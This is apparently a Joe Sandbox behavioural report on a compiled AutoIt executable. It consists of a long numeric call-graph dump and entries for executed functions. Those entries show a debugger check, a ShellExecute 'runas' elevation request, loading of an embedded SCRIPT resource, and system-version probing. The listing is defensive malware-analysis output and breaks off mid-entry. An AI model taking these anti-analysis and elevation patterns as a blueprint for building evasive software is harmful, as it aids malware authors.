98075 777c8e 59 API calls 98071->98075 98076 7ae826 98074->98076 98077 7ae805 98074->98077 98080 774faa 84 API calls 98076->98080 98079 774faa 84 API calls 98077->98079 98079->98066 98081 7ae82b 98080->98081 98082 790f36 Mailbox 59 API calls 98081->98082 98089 7ae85f 98082->98089 98086 773bcd 98086->96874 98086->96897 98090 77766f 59 API calls 98089->98090 98124 7ae8a8 Mailbox 98090->98124 98094 7aea99 98247 7d7388 59 API calls Mailbox 98094->98247 98096 776e6c Mailbox 98153 775934 98096->98153 98100 7aeabb 98248 7df656 59 API calls 2 library calls 98100->98248 98103 7aeac8 98104 792ed5 _free 58 API calls 98103->98104 98104->98096 98108 77766f 59 API calls 98108->98124 98116 7cfa6e 59 API calls 98116->98124 98117 777f41 59 API calls 98117->98124 98119 7d7428 59 API calls 98119->98124 98121 7aeaeb 98249 7cfad2 89 API calls 4 library calls 98121->98249 98123 7aeb04 98125 792ed5 _free 58 API calls 98123->98125 98124->98094 98124->98108 98124->98116 98124->98117 98124->98119 98124->98121 98245 7cf98f 61 API calls 2 library calls 98124->98245 98246 777373 59 API calls Mailbox 98124->98246 98126 7ae821 98125->98126 98126->98096 98128 790f36 Mailbox 59 API calls 98127->98128 98129 7cfa9e _memmove 98128->98129 98129->98027 98129->98129 98132 7d7433 98130->98132 98131 790f36 Mailbox 59 API calls 98133 7d744a 98131->98133 98132->98131 98134 777f41 59 API calls 98133->98134 98135 7d7459 98133->98135 98134->98135 98135->98027 98137 77770f 98136->98137 98141 777682 _memmove 98136->98141 98139 790f36 Mailbox 59 API calls 98137->98139 98138 790f36 Mailbox 59 API calls 98140 777689 98138->98140 98139->98141 98142 790f36 Mailbox 59 API calls 98140->98142 98143 7776b2 98140->98143 98141->98138 98142->98143 98143->98027 98145 7774d0 98144->98145 98147 77757e 98144->98147 98146 790f36 Mailbox 59 API calls 98145->98146 98149 777502 98145->98149 98146->98149 98147->98027 98148 790f36 59 API calls Mailbox 98148->98149 98149->98147 98149->98148 98150->98012 98151->98027 98152->98017 98154 775dcf CloseHandle 98153->98154 98155 77593c Mailbox 98154->98155 98156 775dcf CloseHandle 98155->98156 98157 77594b 98156->98157 98157->98086 98158->98040 98160 775dcf CloseHandle 98159->98160 98161 775962 98160->98161 98252 775df9 98161->98252 98163 7759a4 98163->98041 98163->98044 98164 775981 98164->98163 98260 775770 98164->98260 98166 775993 98277 7753db SetFilePointerEx SetFilePointerEx 98166->98277 98168 77599a 98168->98163 98278 7d349e 98168->98278 98170->98053 98171->98069 98177 775c68 98172->98177 98173 775cef SetFilePointerEx 98302 775dae SetFilePointerEx 98173->98302 98174 7ae081 98303 775dae SetFilePointerEx 98174->98303 98177->98173 98177->98174 98179 775cc3 98177->98179 98178 7ae09b 98179->98050 98181 7777c7 59 API calls 98180->98181 98182 77470f 98181->98182 98183 7777c7 59 API calls 98182->98183 98184 774717 98183->98184 98185 7777c7 59 API calls 98184->98185 98186 77471f 98185->98186 98187 7777c7 59 API calls 98186->98187 98188 774727 98187->98188 98189 7ad82b 98188->98189 98190 77475b 98188->98190 98191 7781a7 59 API calls 98189->98191 98192 7779ab 59 API calls 98190->98192 98193 7ad834 98191->98193 98194 774769 98192->98194 98195 777eec 59 API calls 98193->98195 98196 777e8c 59 API calls 98194->98196 98198 77479e 98195->98198 98197 774773 98196->98197 98197->98198 98199 7779ab 59 API calls 98197->98199 98200 7747de 98198->98200 98201 7747bd 98198->98201 98213 7ad854 98198->98213 98202 774794 98199->98202 98304 7779ab 98200->98304 98207 777b52 59 API calls 98201->98207 98206 777e8c 59 API calls 98202->98206 98204 7747ef 98208 774801 98204->98208 98211 7781a7 59 API calls 98204->98211 98205 7ad924 98209 777d2c 59 API calls 98205->98209 98206->98198 98210 7747c7 98207->98210 98212 774811 98208->98212 98214 7781a7 59 API calls 98208->98214 98226 7ad8e1 98209->98226 98210->98200 98217 7779ab 59 API calls 98210->98217 98211->98208 98216 774818 98212->98216 98218 7781a7 59 API calls 98212->98218 98213->98205 98215 7ad90d 98213->98215 98222 7ad88b 98213->98222 98214->98212 98215->98205 98220 7ad8f8 98215->98220 98219 7781a7 59 API calls 98216->98219 98228 77481f Mailbox 98216->98228 98217->98200 98218->98216 98219->98228 98224 777d2c 59 API calls 98220->98224 98221 7ad8e9 98223 777d2c 59 API calls 98221->98223 98222->98221 98229 7ad8d4 98222->98229 98223->98226 98224->98226 98225 777b52 59 API calls 98225->98226 98226->98200 98226->98225 98317 777a84 59 API calls 2 library calls 98226->98317 98228->98071 98230 777d2c 59 API calls 98229->98230 98230->98226 98242->98041 98243->98047 98244->98126 98245->98124 98246->98124 98247->98100 98248->98103 98249->98123 98253 775e12 CreateFileW 98252->98253 98254 7ae0b1 98252->98254 98256 775e34 98253->98256 98255 7ae0b7 CreateFileW 98254->98255 98254->98256 98255->98256 98257 7ae0dd 98255->98257 98256->98164 98258 775c4e 2 API calls 98257->98258 98259 7ae0e8 98258->98259 98259->98256 98261 7adefe 98260->98261 98262 77578b 98260->98262 98263 77581a 98261->98263 98287 775e3f 98261->98287 98262->98263 98264 775c4e 2 API calls 98262->98264 98263->98166 98265 7757ad 98264->98265 98267 77538e 59 API calls 98265->98267 98268 7757b7 98267->98268 98268->98261 98269 7757c4 98268->98269 98270 790f36 Mailbox 59 API calls 98269->98270 98271 7757cf 98270->98271 98272 77538e 59 API calls 98271->98272 98273 7757da 98272->98273 98281 775d20 98273->98281 98276 775c4e 2 API calls 98276->98263 98277->98168 98293 7d339d 98278->98293 98280 7d34aa WriteFile 98280->98163 98282 775d93 98281->98282 98286 775d2e 98281->98286 98292 775dae SetFilePointerEx 98282->98292 98284 775807 98284->98276 98285 775d66 ReadFile 98285->98284 98285->98286 98286->98284 98286->98285 98288 775c4e 2 API calls 98287->98288 98289 775e60 98288->98289 98290 775c4e 2 API calls 98289->98290 98291 775e74 98290->98291 98291->98263 98292->98286 98294 7d33af 98293->98294 98295 7d33a4 98293->98295 98294->98280 98300 775dae SetFilePointerEx 98295->98300 98297 7d3409 SetFilePointerEx 98301 775dae SetFilePointerEx 98297->98301 98299 7d3428 98299->98280 98300->98297 98301->98299 98302->98179 98303->98178 98305 777a17 98304->98305 98306 7779ba 98304->98306 98308 777e8c 59 API calls 98305->98308 98306->98305 98307 7779c5 98306->98307 98309 7779e0 98307->98309 98310 7aee62 98307->98310 98314 7779e8 _memmove 98308->98314 98318 778087 59 API calls Mailbox 98309->98318 98311 778189 59 API calls 98310->98311 98313 7aee6c 98311->98313 98315 790f36 Mailbox 59 API calls 98313->98315 98314->98204 98316 7aee8c 98315->98316 98317->98226 98318->98314 98320 776ef5 98319->98320 98325 777009 98319->98325 98321 790f36 Mailbox 59 API calls 98320->98321 98320->98325 98323 776f1c 98321->98323 98322 790f36 Mailbox 59 API calls 98329 776f91 98322->98329 98323->98322 98325->97013 98327 7774bd 59 API calls 98327->98329 98328 77766f 59 API calls 98328->98329 98329->98325 98329->98327 98329->98328 98332 7763a0 94 API calls 2 library calls 98329->98332 98333 7c68a9 59 API calls Mailbox 98329->98333 98330->97016 98331->97018 98332->98329 98333->98329 98334->97031 98335->97032 98883 77e70b 98886 77d260 98883->98886 98885 77e719 98887 77d27d 98886->98887 98915 77d4dd 98886->98915 98888 7b29ea 98887->98888 98889 7b2a39 98887->98889 98918 77d2a4 98887->98918 98891 7b29ed 98888->98891 98900 7b2a08 98888->98900 98930 7ea4fb 351 API calls __cinit 98889->98930 98893 7b29f9 98891->98893 98891->98918 98928 7eab0f 351 API calls 98893->98928 98894 792ec0 __cinit 67 API calls 98894->98918 98897 77d594 98922 778bb2 68 API calls 98897->98922 98898 7b2c0e 98898->98898 98899 77d6ab 98899->98885 98900->98915 98929 7eafb7 351 API calls 3 library calls 98900->98929 98904 7b2b55 98934 7ea866 89 API calls 98904->98934 98905 77d5a3 98905->98885 98908 778620 69 API calls 98908->98918 98915->98899 98935 7d9ed4 89 API calls 4 library calls 98915->98935 98916 77a000 351 API calls 98916->98918 98917 7781a7 59 API calls 98917->98918 98918->98894 98918->98897 98918->98899 98918->98904 98918->98908 98918->98915 98918->98916 98918->98917 98920 7788a0 68 API calls __cinit 98918->98920 98921 7786a2 68 API calls 98918->98921 98923 77859a 68 API calls 98918->98923 98924 77d0dc 351 API calls 98918->98924 98925 779f3a 59 API calls Mailbox 98918->98925 98926 77d060 89 API calls 98918->98926 98927 77cedd 351 API calls 98918->98927 98931 778bb2 68 API calls 98918->98931 98932 779e9c 60 API calls Mailbox 98918->98932 98933 7c6ae3 60 API calls 98918->98933 98920->98918 98921->98918 98922->98905 98923->98918 98924->98918 98925->98918 98926->98918 98927->98918 98928->98899 98929->98915 98930->98918 98931->98918 98932->98918 98933->98918 98934->98915 98935->98898 98936 77568a 98943 775c18 98936->98943 98942 7756ba Mailbox 98944 790f36 Mailbox 59 API calls 98943->98944 98945 775c2b 98944->98945 98946 790f36 Mailbox 59 API calls 98945->98946 98947 77569c 98946->98947 98948 775632 98947->98948 98955 775a2f 98948->98955 98950 775d20 2 API calls 98953 775643 98950->98953 98952 775674 98952->98942 98954 7781c1 61 API calls Mailbox 98952->98954 98953->98950 98953->98952 98962 775bda 59 API calls 2 library calls 98953->98962 98954->98942 98956 775a40 98955->98956 98957 7adf95 98955->98957 98956->98953 98963 7c6223 59 API calls Mailbox 98957->98963 98959 7adf9f 98960 790f36 Mailbox 59 API calls 98959->98960 98961 7adfab 98960->98961 98962->98953 98963->98959 98964 7b0155 98970 77ade2 Mailbox 98964->98970 98966 7b0bb5 99115 7c63f2 98966->99115 98968 7b0bbe 98970->98966 98970->98968 98972 77b6c1 98970->98972 98977 7dd106 98970->98977 99024 7dd107 98970->99024 99071 782123 98970->99071 99111 779df0 59 API calls Mailbox 98970->99111 99112 778e34 59 API calls Mailbox 98970->99112 99113 7c71e5 59 API calls 98970->99113 99114 7d9ed4 89 API calls 4 library calls 98972->99114 98978 7dd131 98977->98978 98979 7dd126 98977->98979 98982 7777c7 59 API calls 98978->98982 99022 7dd20b Mailbox 98978->99022 99118 779c9c 59 API calls 98979->99118 98981 790f36 Mailbox 59 API calls 98983 7dd254 98981->98983 98984 7dd155 98982->98984 98985 7dd260 98983->98985 99121 775906 60 API calls Mailbox 98983->99121 98987 7777c7 59 API calls 98984->98987 98988 779997 84 API calls 98985->98988 98989 7dd15e 98987->98989 98990 7dd278 98988->98990 98991 779997 84 API calls 98989->98991 98992 775956 67 API calls 98990->98992 98993 7dd16a 98991->98993 98994 7dd287 98992->98994 98995 7746f9 59 API calls 98993->98995 98996 7dd28b GetLastError 98994->98996 98999 7dd2bf 98994->98999 98997 7dd17f 98995->98997 99002 7dd2a4 98996->99002 98998 777c8e 59 API calls 98997->98998 99003 7dd1b2 98998->99003 99000 7dd2ea 98999->99000 99001 7dd321 98999->99001 99005 790f36 Mailbox 59 API calls 99000->99005 99004 790f36 Mailbox 59 API calls 99001->99004 99020 7dd214 Mailbox 99002->99020 99122 775a1a CloseHandle 99002->99122 99006 7dd204 99003->99006 99011 7d3c7b 3 API calls 99003->99011 99007 7dd326 99004->99007 99008 7dd2ef 99005->99008 99120 779c9c 59 API calls 99006->99120 99015 7777c7 59 API calls 99007->99015 99007->99020 99012 7dd300 99008->99012 99016 7777c7 59 API calls 99008->99016 99013 7dd1c2 99011->99013 99123 7df656 59 API calls 2 library calls 99012->99123 99013->99006 99014 7dd1c6 99013->99014 99017 777f41 59 API calls 99014->99017 99015->99020 99016->99012 99019 7dd1d3 99017->99019 99119 7d3a6e 63 API calls Mailbox 99019->99119 99020->98970 99022->98981 99022->99020 99023 7dd1dc Mailbox 99023->99006 99025 7dd131 99024->99025 99026 7dd126 99024->99026 99029 7777c7 59 API calls 99025->99029 99069 7dd20b Mailbox 99025->99069 99124 779c9c 59 API calls 99026->99124 99028 790f36 Mailbox 59 API calls 99030 7dd254 99028->99030 99031 7dd155 99029->99031 99033 7dd260 99030->99033 99127 775906 60 API calls Mailbox 99030->99127 99034 7777c7 59 API calls 99031->99034 99035 779997 84 API calls 99033->99035 99036 7dd15e 99034->99036 99037 7dd278 99035->99037 99038 779997 84 API calls 99036->99038 99039 775956 67 API calls 99037->99039 99040 7dd16a 99038->99040 99041 7dd287 99039->99041 99042 7746f9 59 API calls 99040->99042 99043 7dd2bf 99041->99043 99044 7dd28b GetLastError 99041->99044 99045 7dd17f 99042->99045 99048 7dd2ea 99043->99048 99049 7dd321 99043->99049 99046 7dd2a4 99044->99046 99047 777c8e 59 API calls 99045->99047 99067 7dd214 Mailbox 99046->99067 99128 775a1a CloseHandle 99046->99128 99050 7dd1b2 99047->99050 99052 790f36 Mailbox 59 API calls 99048->99052 99051 790f36 Mailbox 59 API calls 99049->99051 99053 7dd204 99050->99053 99058 7d3c7b 3 API calls 99050->99058 99054 7dd326 99051->99054 99055 7dd2ef 99052->99055 99126 779c9c 59 API calls 99053->99126 99062 7777c7 59 API calls 99054->99062 99054->99067 99059 7dd300 99055->99059 99063 7777c7 59 API calls 99055->99063 99060 7dd1c2 99058->99060 99129 7df656 59 API calls 2 library calls 99059->99129 99060->99053 99061 7dd1c6 99060->99061 99064 777f41 59 API calls 99061->99064 99062->99067 99063->99059 99066 7dd1d3 99064->99066 99125 7d3a6e 63 API calls Mailbox 99066->99125 99067->98970 99069->99028 99069->99067 99070 7dd1dc Mailbox 99070->99053 99130 779bf8 99071->99130 99075 790f36 Mailbox 59 API calls 99076 782154 99075->99076 99079 782164 99076->99079 99158 775906 60 API calls Mailbox 99076->99158 99077 7b68de 99078 782189 99077->99078 99162 7df600 59 API calls 99077->99162 99087 782196 99078->99087 99163 779c9c 59 API calls 99078->99163 99081 779997 84 API calls 99079->99081 99083 782172 99081->99083 99085 775956 67 API calls 99083->99085 99084 7b6926 99086 7b692e 99084->99086 99084->99087 99088 782181 99085->99088 99164 779c9c 59 API calls 99086->99164 99089 775e3f 2 API calls 99087->99089 99088->99077 99088->99078 99161 775a1a CloseHandle 99088->99161 99092 78219d 99089->99092 99093 7b6940 99092->99093 99094 7821b7 99092->99094 99096 790f36 Mailbox 59 API calls 99093->99096 99095 7777c7 59 API calls 99094->99095 99097 7821bf 99095->99097 99098 7b6946 99096->99098 99143 7756d2 99097->99143 99103 7b695a 99098->99103 99165 7759b0 ReadFile SetFilePointerEx 99098->99165 99102 7821ce 99105 7b695e _memmove 99102->99105 99159 779b9c 59 API calls Mailbox 99102->99159 99103->99105 99166 7d776d 59 API calls 2 library calls 99103->99166 99106 7821e2 Mailbox 99107 78221c 99106->99107 99108 775dcf CloseHandle 99106->99108 99107->98970 99109 782210 99108->99109 99109->99107 99160 775a1a CloseHandle 99109->99160 99111->98970 99112->98970 99113->98970 99114->98966 99170 7c6334 99115->99170 99117 7c6400 99117->98968 99118->98978 99119->99023 99120->99022 99121->98985 99122->99020 99123->99020 99124->99025 99125->99070 99126->99069 99127->99033 99128->99067 99129->99067 99131 7afb2f 99130->99131 99132 779c08 99130->99132 99133 7afb40 99131->99133 99134 777d2c 59 API calls 99131->99134 99137 790f36 Mailbox 59 API calls 99132->99137 99135 777eec 59 API calls 99133->99135 99134->99133 99136 7afb4a 99135->99136 99140 7777c7 59 API calls 99136->99140 99142 779c34 99136->99142 99138 779c1b 99137->99138 99138->99136 99139 779c26 99138->99139 99141 777f41 59 API calls 99139->99141 99139->99142 99140->99142 99141->99142 99142->99075 99142->99077 99144 775702 99143->99144 99145 7756dd 99143->99145 99146 777eec 59 API calls 99144->99146 99145->99144 99149 7756ec 99145->99149 99150 7d32a2 99146->99150 99147 7d32d1 99147->99102 99151 775c18 59 API calls 99149->99151 99150->99147 99167 7d323e ReadFile SetFilePointerEx 99150->99167 99168 777a84 59 API calls 2 library calls 99150->99168 99152 7d33c2 99151->99152 99154 775632 61 API calls 99152->99154 99155 7d33d0 99154->99155 99157 7d33e0 Mailbox 99155->99157 99169 77793a 61 API calls Mailbox 99155->99169 99157->99102 99158->99079 99159->99106 99160->99107 99161->99077 99162->99077 99163->99084 99164->99092 99165->99103 99166->99105 99167->99150 99168->99150 99169->99157 99171 7c635c 99170->99171 99172 7c633f 99170->99172 99171->99117 99172->99171 99174 7c631f 59 API calls Mailbox 99172->99174 99174->99172 99175 7afe35 99176 7afe3f 99175->99176 99209 77ac90 Mailbox _memmove 99175->99209 99273 778e34 59 API calls Mailbox 99176->99273 99181 77b5d5 99187 7781a7 59 API calls 99181->99187 99182 790f36 59 API calls Mailbox 99200 77a097 Mailbox 99182->99200 99185 77b5da 99284 7d9ed4 89 API calls 4 library calls 99185->99284 99196 77a1b7 99187->99196 99188 7b03ae 99278 7d9ed4 89 API calls 4 library calls 99188->99278 99189 777f41 59 API calls 99189->99209 99192 7781a7 59 API calls 99192->99200 99193 7777c7 59 API calls 99193->99200 99194 7c71e5 59 API calls 99194->99200 99195 7b03bd 99198 7c63f2 Mailbox 59 API calls 99198->99196 99199 7b0d2f 99283 7d9ed4 89 API calls 4 library calls 99199->99283 99200->99181 99200->99182 99200->99185 99200->99188 99200->99192 99200->99193 99200->99194 99200->99196 99200->99199 99201 792ec0 67 API calls __cinit 99200->99201 99204 77a6ba 99200->99204 99267 77ca20 351 API calls 2 library calls 99200->99267 99268 77ba60 60 API calls Mailbox 99200->99268 99201->99200 99203 7ebd80 351 API calls 99203->99209 99282 7d9ed4 89 API calls 4 library calls 99204->99282 99205 7c63f2 Mailbox 59 API calls 99205->99209 99206 77b416 99272 77f803 351 API calls 99206->99272 99208 77a000 351 API calls 99208->99209 99209->99189 99209->99196 99209->99200 99209->99203 99209->99205 99209->99206 99209->99208 99210 7b0bc3 99209->99210 99212 7b0bd1 99209->99212 99215 77b37c 99209->99215 99216 790f36 59 API calls Mailbox 99209->99216 99221 77b685 99209->99221 99224 77ade2 Mailbox 99209->99224 99229 7ec3f4 99209->99229 99261 7d79ff 99209->99261 99274 7c71e5 59 API calls 99209->99274 99275 7ec2a7 85 API calls 2 library calls 99209->99275 99280 779df0 59 API calls Mailbox 99210->99280 99281 7d9ed4 89 API calls 4 library calls 99212->99281 99214 7b0bb5 99214->99196 99214->99198 99270 779e9c 60 API calls Mailbox 99215->99270 99216->99209 99218 77b38d 99271 779e9c 60 API calls Mailbox 99218->99271 99279 7d9ed4 89 API calls 4 library calls 99221->99279 99224->99196 99224->99214 99224->99221 99226 7dd107 101 API calls 99224->99226 99227 782123 95 API calls 99224->99227 99228 7dd106 101 API calls 99224->99228 99269 779df0 59 API calls Mailbox 99224->99269 99276 778e34 59 API calls Mailbox 99224->99276 99277 7c71e5 59 API calls 99224->99277 99226->99224 99227->99224 99228->99224 99230 7777c7 59 API calls 99229->99230 99231 7ec408 99230->99231 99232 7777c7 59 API calls 99231->99232 99233 7ec410 99232->99233 99234 7777c7 59 API calls 99233->99234 99235 7ec418 99234->99235 99236 779997 84 API calls 99235->99236 99260 7ec426 99236->99260 99237 777a84 59 API calls 99237->99260 99238 777d2c 59 API calls 99238->99260 99239 7ec60f 99240 7ec63c Mailbox 99239->99240 99287 779b9c 59 API calls Mailbox 99239->99287 99240->99209 99242 7ec5f6 99243 777e0b 59 API calls 99242->99243 99246 7ec603 99243->99246 99244 7ec611 99247 777e0b 59 API calls 99244->99247 99245 7781a7 59 API calls 99245->99260 99249 777c8e 59 API calls 99246->99249 99250 7ec620 99247->99250 99248 777faf 59 API calls 99252 7ec4bd CharUpperBuffW 99248->99252 99249->99239 99253 777c8e 59 API calls 99250->99253 99251 777faf 59 API calls 99254 7ec57d CharUpperBuffW 99251->99254 99285 77859a 68 API calls 99252->99285 99253->99239 99286 77c707 69 API calls 2 library calls 99254->99286 99257 779997 84 API calls 99257->99260 99258 777e0b 59 API calls 99258->99260 99259 777c8e 59 API calls 99259->99260 99260->99237 99260->99238 99260->99239 99260->99240 99260->99242 99260->99244 99260->99245 99260->99248 99260->99251 99260->99257 99260->99258 99260->99259 99262 7d7a0b 99261->99262 99263 790f36 Mailbox 59 API calls 99262->99263 99264 7d7a19 99263->99264 99265 7777c7 59 API calls 99264->99265 99266 7d7a27 99264->99266 99265->99266 99266->99209 99267->99200 99268->99200 99269->99224 99270->99218 99271->99206 99272->99221 99273->99209 99274->99209 99275->99209 99276->99224 99277->99224 99278->99195 99279->99214 99280->99214 99281->99214 99282->99196 99283->99185 99284->99196 99285->99260 99286->99260 99287->99240

                                                Executed Functions

                                                Function 00773B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00773B7A
                                                • IsDebuggerPresent.KERNEL32 ref: 00773B8C
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,008352F8,008352E0,?,?), ref: 00773BFD
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                  • Part of subcall function 00780A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00773C26,008352F8,?,?,?), ref: 00780ACE
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00773C81
                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00827770,00000010), ref: 007AD3EC
                                                • SetCurrentDirectoryW.KERNEL32(?,008352F8,?,?,?), ref: 007AD424
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00824260,008352F8,?,?,?), ref: 007AD4AA
                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 007AD4B1
                                                  • Part of subcall function 00773A58: GetSysColorBrush.USER32(0000000F), ref: 00773A62
                                                  • Part of subcall function 00773A58: LoadCursorW.USER32(00000000,00007F00), ref: 00773A71
                                                  • Part of subcall function 00773A58: LoadIconW.USER32(00000063), ref: 00773A88
                                                  • Part of subcall function 00773A58: LoadIconW.USER32(000000A4), ref: 00773A9A
                                                  • Part of subcall function 00773A58: LoadIconW.USER32(000000A2), ref: 00773AAC
                                                  • Part of subcall function 00773A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00773AD2
                                                  • Part of subcall function 00773A58: RegisterClassExW.USER32(?), ref: 00773B28
                                                  • Part of subcall function 007739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00773A15
                                                  • Part of subcall function 007739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00773A36
                                                  • Part of subcall function 007739E7: ShowWindow.USER32(00000000,?,?), ref: 00773A4A
                                                  • Part of subcall function 007739E7: ShowWindow.USER32(00000000,?,?), ref: 00773A53
                                                  • Part of subcall function 007743DB: _memset.LIBCMT ref: 00774401
                                                  • Part of subcall function 007743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007744A6
                                                Strings
                                                • runas, xrefs: 007AD4A5
                                                • This is a third-party compiled AutoIt script., xrefs: 007AD3E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                • API String ID: 529118366-3287110873
                                                • Opcode ID: 8453ce6bc98b3b2df68c0f846a0e5a09722e486d5f63e43740710017d012c7fc
                                                • Instruction ID: f7ad32933c17f6b4cb9ef260252ae5c191948f2a2bfa390512a305fb7a5ff8b5
                                                • Opcode Fuzzy Hash: 8453ce6bc98b3b2df68c0f846a0e5a09722e486d5f63e43740710017d012c7fc
                                                • Instruction Fuzzy Hash: C4510630904248EACF15EBB4DC09AFE7B74FF85780F00C165F859A22A1DA7C4A45DB61
                                                Function 00774FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 944 774fe9-775001 CreateStreamOnHGlobal 945 775003-77501a FindResourceExW 944->945 946 775021-775026 944->946 947 7adc8c-7adc9b LoadResource 945->947 948 775020 945->948 947->948 949 7adca1-7adcaf SizeofResource 947->949 948->946 949->948 950 7adcb5-7adcc0 LockResource 949->950 950->948 951 7adcc6-7adcce 950->951 952 7adcd2-7adce4 951->952 952->948
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00774EEE,?,?,00000000,00000000), ref: 00774FF9
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00774EEE,?,?,00000000,00000000), ref: 00775010
                                                • LoadResource.KERNEL32(?,00000000,?,?,00774EEE,?,?,00000000,00000000,?,?,?,?,?,?,00774F8F), ref: 007ADC90
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00774EEE,?,?,00000000,00000000,?,?,?,?,?,?,00774F8F), ref: 007ADCA5
                                                • LockResource.KERNEL32(Nw,?,?,00774EEE,?,?,00000000,00000000,?,?,?,?,?,?,00774F8F,00000000), ref: 007ADCB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT$Nw
                                                • API String ID: 3051347437-742608515
                                                • Opcode ID: 2419ad31a08593ece3294807ded8081c521e7ecffe8bba85d21c834c1749d9a1
                                                • Instruction ID: c6ace4f5d66cde17382a7f47fca7de0efc340fb677858fce724f99626881a18b
                                                • Opcode Fuzzy Hash: 2419ad31a08593ece3294807ded8081c521e7ecffe8bba85d21c834c1749d9a1
                                                • Instruction Fuzzy Hash: B1115A75200700AFDB218B65DC48F6B7BB9FFC9B51F208168F40AC62A0DBA5EC00C6A4
                                                Function 00774AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 954 774afe-774b5e call 7777c7 GetVersionExW call 777d2c 959 774b64 954->959 960 774c69-774c6b 954->960 961 774b67-774b6c 959->961 962 7adac0-7adacc 960->962 964 774b72 961->964 965 774c70-774c71 961->965 963 7adacd-7adad1 962->963 966 7adad3 963->966 967 7adad4-7adae0 963->967 968 774b73-774baa call 777e8c call 777886 964->968 965->968 966->967 967->963 969 7adae2-7adae7 967->969 977 7adbbd-7adbc0 968->977 978 774bb0-774bb1 968->978 969->961 971 7adaed-7adaf4 969->971 971->962 973 7adaf6 971->973 976 7adafb-7adafe 973->976 979 774bf1-774c08 GetCurrentProcess IsWow64Process 976->979 980 7adb04-7adb22 976->980 981 7adbd9-7adbdd 977->981 982 7adbc2 977->982 978->976 983 774bb7-774bc2 978->983 990 774c0d-774c1e 979->990 991 774c0a 979->991 980->979 984 7adb28-7adb2e 980->984 988 7adbc8-7adbd1 981->988 989 7adbdf-7adbe8 981->989 985 7adbc5 982->985 986 7adb43-7adb49 983->986 987 774bc8-774bca 983->987 994 7adb38-7adb3e 984->994 995 7adb30-7adb33 984->995 985->988 998 7adb4b-7adb4e 986->998 999 7adb53-7adb59 986->999 996 7adb5e-7adb6a 987->996 997 774bd0-774bd3 987->997 988->981 989->985 1000 7adbea-7adbed 989->1000 992 774c20-774c30 call 774c95 990->992 993 774c89-774c93 GetSystemInfo 990->993 991->990 1011 774c32-774c3f call 774c95 992->1011 1012 774c7d-774c87 GetSystemInfo 992->1012 1006 774c56-774c66 993->1006 994->979 995->979 1001 7adb6c-7adb6f 996->1001 1002 7adb74-7adb7a 996->1002 1004 7adb8a-7adb8d 997->1004 1005 774bd9-774be8 997->1005 998->979 999->979 1000->988 1001->979 1002->979 1004->979 1008 7adb93-7adba8 1004->1008 1009 7adb7f-7adb85 1005->1009 1010 774bee 1005->1010 1013 7adbaa-7adbad 1008->1013 1014 7adbb2-7adbb8 1008->1014 1009->979 1010->979 1019 774c76-774c7b 1011->1019 1020 774c41-774c45 GetNativeSystemInfo 1011->1020 1016 774c47-774c4b 1012->1016 1013->979 1014->979 1016->1006 1018 774c4d-774c50 FreeLibrary 1016->1018 1018->1006 1019->1020 1020->1016
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00774B2B
